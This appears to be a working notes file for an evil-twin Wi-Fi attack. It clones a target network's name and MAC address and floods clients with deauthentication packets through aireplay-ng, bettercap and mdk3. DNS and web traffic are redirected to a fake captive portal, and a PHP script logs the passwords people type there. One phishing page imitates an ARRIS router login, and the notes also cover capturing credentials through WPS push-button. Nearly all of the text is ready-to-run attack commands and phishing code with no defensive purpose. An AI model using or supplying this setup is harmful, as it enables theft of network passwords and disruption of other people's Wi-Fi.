find /sys/class/net/ -type l -print | grep -v "/lo$"
IFACE=wlan0
IFACEM=${IFACE:?}mon
IFACE_MODE="$(iw dev ${IFACE:?} info | awk '/type/ {print $2}')"
IFACE_PHY="$(iw dev ${IFACE:?} info | awk '/wiphy/ {print "phy"$2}')"
IFACE_TX="$(iw dev ${IFACE:?} info | awk '/txpower/ {print $2}')"
IFACE_MAC="$(iw dev ${IFACE:?} info | awk '/addr/ {print $2}')"
TARGET_ESSID='Home WaiFai'
TARGET_BSSID='A1:B2:C3:D4:E5:F6'
TARGET_CHANNEL='5'
TARGET_CLIENT='A1:B2:C3:D4:E5:F6'
IFACE_IPADDR='192.168.0'
rfkill unblock wifi
ip link set dev ${IFACE:?} down
iw reg set US # BO
##iw ${IFACE:?} set txpower fixed 3000
##iwconfig ${IFACE:?} txpower 30
#iw ${IFACE:?} set monitor control
#airmon-ng check
#airmon-ng check kill
#airmon-ng start ${IFACE:?}
iw phy ${IFACE_PHY:?} interface add ${IFACE:?}mon type monitor
ip link set dev ${IFACE:?} up
rfkill unblock wifi
ip link set dev ${IFACE:?} down
iw reg set US # BO
iwconfig ${IFACE:?} mode managed
#iwconfig ${IFACE:?} mode ad-hoc
#iwconfig ${IFACE:?} channel 3
#iw set ${IFACE:?} type monitor #?
ip link set dev ${IFACE:?} up
rfkill unblock wifi
ip link set dev ${IFACE:?} down
iw dev ${IFACE:?} del
bettercap -iface ${IFACEM:?} -eval 'wifi.recon on;wifi.region US;wifi.txpower 30;set wifi.show.limit 13;set wifi.rssi.min -70;set wifi.show.sort rssi asc;set wifi.show.manufacturer true;set ticker.period 1;set ticker.commands "clear;wifi.show";ticker on')
# -eval 'wifi.recon on;wifi.show')
## rssi, bssid, essid, channel, encryption, clients, seen, sent, rcvd # desc|asc
# wifi.interface ${IFACEM:?}
# set wifi.show.filter ^XX:XX
airodump-ng --encrypt WPA ${IFACEM:?}
ip link set dev ${IFACE:?} down
macchanger --mac=${TARGET_BSSID:?} ${IFACE:?}
#macchanger -r ${IFACE:?}
ip link set dev ${IFACE:?} up
# http://standards-oui.ieee.org/oui.txt# /usr/share/nmap/nmap-mac-prefixescat oui.txt | grep -i "$(printf "${TARGET_BSSID:?}" | tr -d ':' | head -c 6)" | cut -d')' -f2 | tr -d '\t'
airbase-ng -e "${TARGET_ESSID:?}" -c ${TARGET_CHANNEL:?} ${IFACEM:?}
#airbase-ng -c ${TARGET_CHANNEL:?} -a "${TARGET_BSSID:?}" -e "${TARGET_ESSID:?}" -W 1 ${IFACEM:?}
#sleep 2
#airbase-ng -e "${TARGET_ESSID:?} " -c 1 -L -W 1 ${IFACEM:?} # Con el espacio
# -Z # 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
nano hostapd.conf
interface=${IFACE:?}
channel=${TARGET_CHANNEL:?}
hw_mode=g
ssid=${TARGET_ESSID:?}
#bridge=br0
auth_algs=1
wmm_enabled=0
hostapd -P hostapd.pid hostapd.conf
bettercap -iface ${IFACEM:?} -eval "set wifi.ap.ssid '${TARGET_ESSID:?}';set wifi.ap.bssid ${TARGET_BSSIDX:?};set wifi.ap.channel ${TARGET_CHANNEL:?};set wifi.ap.encryption false;wifi.recon on; wifi.ap"
ip link set dev ${IFACE:?} up
ip addr add ${IFACE_IPADDR:?}.1/24 broadcast ${IFACE_IPADDR:?}.255 dev ${IFACE:?}
# iptables || iptables-legacy
# modinfo nf_tables || modinfo ip_tables
iptables --flush
iptables -t nat --flush
#iptables --table nat --append POSTROUTING --out-interface ${IFACE2:?} -j MASQUERADE
iptables --append FORWARD --in-interface ${IFACE:?} -j ACCEPT
iptables -t nat -A PREROUTING -i ${IFACE:?} -p udp -m udp --dport 53 -j DNAT --to-destination ${IFACE_IPADDR:?}.1:53
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination ${IFACE_IPADDR:?}.1:80
iptables -t nat -A PREROUTING -i ${IFACE:?} -p tcp -m tcp --dport 80 -j DNAT --to-destination ${IFACE_IPADDR:?}.1:80
iptables -t nat -A PREROUTING -i ${IFACE:?} -p tcp -m tcp --dport 443 -j DNAT --to-destination ${IFACE_IPADDR:?}.1:80
iptables -t nat -A POSTROUTING -j MASQUERADE
sysctl net.ipv4.ip_forward=1 || echo 1 > /proc/sys/net/ipv4/ip_forward
nano dnsmasq.conf
interface=${IFACE:?}
#listen-address=127.0.0.1
listen-address=${IFACE_IPADDR:?}.1
#port=0
#bind-interfaces
dhcp-range=${IFACE_IPADDR:?}.10,${IFACE_IPADDR:?}.250,5m
dhcp-option=3,${IFACE_IPADDR:?}.1
dhcp-option=6,${IFACE_IPADDR:?}.1
server=8.8.8.8
log-queries
log-dhcp
no-hosts
dhcp-option=option:router,${IFACE_IPADDR:?}.1
dhcp-authoritative
address=/gstatic.com/${IFACE_IPADDR:?}.1
address=/connectivitycheck.android.com/${IFACE_IPADDR:?}.1
dnsmasq -C dnsmasq.conf --log-facility=- -x dnsmasq.pid -l dnsmasq.leases -d # -k
#dnsspoof -i ${IFACE:?}
mkdir www.html
nano www.html/loading.html
Loading, please wait ...
nano www.html/post.php
<?php
header ("Location:/loading.html");
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
nano www.html/index.html
<!DOCTYPE html>
<html>
<head>
<title>Sign www.html/index.htmlin</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width,
initial-scale=0.75, maximum-scale=0.75, user-scalable=no">
</head>
<body>
<p> Pulse el boton WPS en su Router o ingrese contrasena.</p>
<form method="post" action="post.php">
<!-- <input type="text" name="email" placeholder="Email" required> -->
<input type="password" name="password" placeholder="Password" required>
<button type="submit" name="submit">Sign in</button>
</form>
</body>
</html>
touch www.html/usernames.txt
php -S ${IFACE_IPADDR:?}.1:80 -t www.html/
tail -f www.html/usernames.txt
aireplay-ng --ignore-negative-one --deauth 0 -a ${TARGET_BSSID:?} ${IFACEM:?}
#aireplay-ng --ignore-negative-one --deauth 0 -a ${TARGET_BSSID:?} -c ${TARGET_CLIENT:?} ${IFACEM:?}
bettercap -iface ${IFACEM:?} -eval "wifi.deauth ${TARGET_BSSID:?}"
#bettercap -iface ${IFACEM:?} -eval "set ticker.period 3;set ticker.commands 'wifi.deauth ${TARGET_BSSID:?}';ticker on"
mdk3 ${IFACEM:?} -d -g -t ${TARGET_BSSID:?} -c ${TARGET_CHANNEL:?}
killall dhclient dhcpcd
nano wpa_supplicant.conf
ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=root
update_config=1
wpa_supplicant -c wpa_supplicant.conf -i ${IFACE:?}
wpa_cli -i ${IFACE:?} wps_pbc any # ~120sec
cat wpa_supplicant.conf
# https://github.com/bettercap/bettercap/releases/
export LD_LIBRARY_PATH=${LD_LIBRARY_PATH:-}:/usr/local/lib:${pwd}/bettercaplib
lsusb -v | grep 'id'
# idVendor 0x148f Ralink Technology, Corp.
# idProduct 0x3070 RT2870/RT3070 Wireless Adapte
modinfo rt2800usb | grep -E "filename|firmware"
ls -l /lib/firmware/rt2870.bin
# https://git.kernel.org/pub/scm/linux/kernel/git/firmware/linux-firmware.git
# https://github.com/NXP/linux-firmware
curl -L https://github.com/NXP/linux-firmware/raw/master/rt2870.bin -o rt2870.bin
mv rt2870.bin /lib/firmware
nano index.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login</title>
<meta charset='UTF-8'>
<meta http-equiv="cache-control" content="no-cache" />
<meta http-equiv="expires" content="0" />
<meta http-equiv="pragma" content="no-cache" />
<meta name="google" value="notranslate">
<script language="Javascript"> var TimeID; function timer() { window.clipboardData.clearData(); timeID = setTimeout('timer()', 100); } </script>
<style type="text/css">
TABLE { width:1200px }
a { font-size:18px; text-decoration:none; font-weight:bold; }
#bg-ffcolor { background-color:#FFFFFF; }
#bg-tcolor { background-color:#FBFCFC; }
#bg-color { background-color:#FDFFFF; }
/**/
#bg-bcolor { background-color:#9E1B32; }
#bg-fcolor { background-color:#191970; }
#ft-fcolor { color:#191970; }
</style>
</head>
<body onload="timer()" oncontextmenu="return false" ondragstart="return false" onselectstart="return false">
<TABLE id="bg-color" style="height:800px;position:absolute;top:0;bottom:0;left:0;right:0;">
<TR id="bg-bcolor" style="height:20px"><TD></TD></TR>
<TR id="bg-fcolor" style="height:10px"><TD></TD></TR>
<TR id="bg-ffcolor" style="height:100px">
<TD>
<TABLE CELLPADDING=0 CELLSPACING=10 style="height:100px">
<TR VALIGN=bottom>
<TD VALIGN=MIDDLE ALIGN=CENTER style="height:100px;height:50%"><img style="height:95px" src="/static.png" alt="LOGO"/></TD>
<TD style="height:100px;width:600px"></TD>
<TD>
<TABLE style="height:100%;width:300px;">
<TR></TR>
<TR></TR>
<TR></TR>
<TR>
<TD VALIGN=MIDDLE ALIGN=CENTER id="bg-fcolor" style="width:100px;"><a style="color:#FFFFFF;" href="/index.html">Home</a></TD>
<TD VALIGN=MIDDLE ALIGN=CENTER id="bg-fcolor" style="whidth:100px;"><a style="color:#FFFFFF;" href="/">Login</a></TD>
<TD style="width:100px;"></TD>
</TR>
</TABLE>
</TD>
</TR>
</TABLE>
</TD>
</TR>
<TR>
<TD>
<TABLE style="height:100%;width:100%">
<TR style="width:100%;">
<TD id="bg-ffcolor" style="width:15%;">
<TABLE CELLPADDING=0 CELLSPACING=10 style="height:100%;width:100%;">
<TR style="height:8%;"><TD></TD></TR>
<TR ALIGN=CENTER style="height:8%;"><TD id="bg-fcolor"><a style="color:#FFFFFF;" href="/setup.html">Wireless Setup</a></TD></TR>
<TR ALIGN=CENTER style="height:8%;"><TD id="bg-fcolor"><a style="color:#FFFFFF;" href="/utils.html">Utilities</a></TD></TR>
<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/restart.html">Restart Router</a></TD></TR>
<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/wipe.html">Restore Factory</a></TD></TR>
<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/backup.html#Default">Default</a></TD></TR>
<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/backup.html#Save">Save/Backup Settings</a></TD></TR>
<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/backup.html#Restore">Restore Previus</a></TD></TR>
<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/settings.html">Settings</a></TD></TR>
<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/settings.html#Sys">System Settings</a></TD></TR>
<TR><TD></TD></TR>
</TABLE>
</TD>
<TD ALIGN=CENTER VALIGN=top id="ft-fcolor" style="width:10%;font-weight:900;font-size:28px;">Login</TD>
<TD style="width:75%;">
<TABLE style="height:100%;width:100%">
<TR style="height:10%;"><TD></TD></TR>
<TR>
<TD COLSPAN=3 VALIGN=top id="bg-tcolor" style="height:20%;width:80%;">
<p style="font-weight:900;font-family:'Courier New'">To start or continue configuring the Router Modem, log in with a password. If you have not set up a password, leave this field blank and click 'Submit'.</p>
<p> ** Password is required!</p>
</TD>
<TD></TD>
</TR>
<form method="post" action="post.php">
<TR style="height:10%;">
<TD ALIGN=CENTER style="width:40%"><strong>Password</strong></TD>
<TD ALIGN=LEFT><input type="password" name="password" placeholder="Password" autocorrect="off" autocomplete="off" autocapitalize="off" required></TD>
</TR>
<TR VALIGN=top>
<TD ALIGN=RIGHT><button type="submit" name="submit">Submit</button></TD>
</TR>
</TABLE>
</TD>
</TR>
</TABLE>
<center><p style="font-size:11px;">Firmware TS0705125C_012814 eSAFE 0 FW Revision 2.0.69_063C</p></center>
<center><p style="font-size:11px;">©2014 ARRIS Group. Inc. ALL RIGHTS RESERVED.</p></center>
<!--
<center><p style="font-size:11px;">Copyright © Huawei Technologies Co. Ltd. 2009-2014. All Rights Reserved.</p></center>
-->
</TD>
</TR>
</TABLE>
</body>
</html>
nano backup.html settings.html utils.html restart.html setup.html wipe.html
<!DOCTYPE html>
<html>
<head><meta http-equiv="refresh" content="1; url=/index.html"></head>
<body><p>TSK637::Pending Task.<p>
<p>AUTH:Failed - <a href="/index.html">Redirection</a></p></body>
</html>